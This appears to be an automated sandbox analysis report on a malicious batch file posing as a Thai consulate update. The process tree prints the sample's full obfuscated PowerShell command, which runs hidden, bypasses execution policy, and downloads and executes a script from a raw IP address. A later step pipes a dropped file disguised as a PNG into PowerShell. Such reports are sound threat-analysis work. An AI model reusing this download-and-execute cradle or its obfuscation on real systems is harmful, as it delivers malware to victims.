Analysis

  • max time kernel
    43s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2022 20:26

General

  • Target

    Thailand/Th-Pass/Consulate-update.bat

  • Size

    42KB

  • MD5

    bdd44c10654add788dcba23da9089978

  • SHA1

    33c482e714965393305acbdf9a596e20ce09d5c2

  • SHA256

    11dd5d54f65eedcf032a3424a2fb4bc558f00574a8c26590ef234249f5738638

  • SHA512

    49fdd5de2f6654ac0e9f4ccd0bcfb4db6b60feaa28e39b3678b49907ebaab6970b14c4d5f38a61f07cb2d23ef5a18536dcd483c9b8988fe23a67329c19b19e52

  • SSDEEP

    96:fEOEY6iJOAFOg7OPV1Hzf7yAMHteKOVXO6zfMHg:xxCPQtuY82g

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Thailand\Th-Pass\Consulate-update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\system32\cmd.exe
      CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell < C:\Users\Admin\AppData\Roaming/educational.png
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:272
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1644

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d9d53f31db5bd7c16cb357306fdf549b

    SHA1

    454d9faa0b0ec41bd609580a21c9f4a7cd1d1e36

    SHA256

    fd56bd3189d2f3eb81ff44708e89ffe0221ab55e792d34aa28f70ad8a879ebc1

    SHA512

    d6418b12304b8e58db17907bc9c5619d041c5190c58301841b124001d824b5044b7401ea4b96d0aa9d6ac89e48828a0521c5a96dad366d6813c11ad47a521368

  • C:\Users\Admin\AppData\Roaming\educational.png
    Filesize

    251B

    MD5

    292374cd21675135acb516497a730fd9

    SHA1

    f6e019093fc9a0952b7ae2c536b0b9f37071d0bf

    SHA256

    86cf5e4e86c0aae75158c04e13051275c341af7bf54b7a7cd49eced95d21b1b0

    SHA512

    491623e21d1740e234925bf0d1df1ac6402404bbcbad1d3e926ebdca0eeb55e1ab2322d38c7501f28b0a8deda853e087bfc22f34ca9b63995428ba8a3c03da32

  • memory/272-62-0x0000000000000000-mapping.dmp
  • memory/1004-54-0x0000000000000000-mapping.dmp
  • memory/1516-59-0x00000000026F4000-0x00000000026F7000-memory.dmp
    Filesize

    12KB

  • memory/1516-55-0x0000000000000000-mapping.dmp
  • memory/1516-60-0x000000001B780000-0x000000001BA7F000-memory.dmp
    Filesize

    2MB

  • memory/1516-61-0x00000000026FB000-0x000000000271A000-memory.dmp
    Filesize

    124KB

  • memory/1516-57-0x000007FEF3B90000-0x000007FEF45B3000-memory.dmp
    Filesize

    10MB

  • memory/1516-68-0x00000000026FB000-0x000000000271A000-memory.dmp
    Filesize

    124KB

  • memory/1516-56-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp
    Filesize

    8KB

  • memory/1516-58-0x000007FEF3030000-0x000007FEF3B8D000-memory.dmp
    Filesize

    11MB

  • memory/1516-66-0x00000000026F4000-0x00000000026F7000-memory.dmp
    Filesize

    12KB

  • memory/1644-64-0x0000000000000000-mapping.dmp
  • memory/1644-69-0x000007FEF3B90000-0x000007FEF45B3000-memory.dmp
    Filesize

    10MB

  • memory/1644-70-0x000007FEEF250000-0x000007FEEFDAD000-memory.dmp
    Filesize

    11MB

  • memory/1644-71-0x00000000027D4000-0x00000000027D7000-memory.dmp
    Filesize

    12KB

  • memory/1644-72-0x000000001B740000-0x000000001BA3F000-memory.dmp
    Filesize

    2MB

  • memory/1644-73-0x00000000027DB000-0x00000000027FA000-memory.dmp
    Filesize

    124KB

  • memory/1644-74-0x00000000027D4000-0x00000000027D7000-memory.dmp
    Filesize

    12KB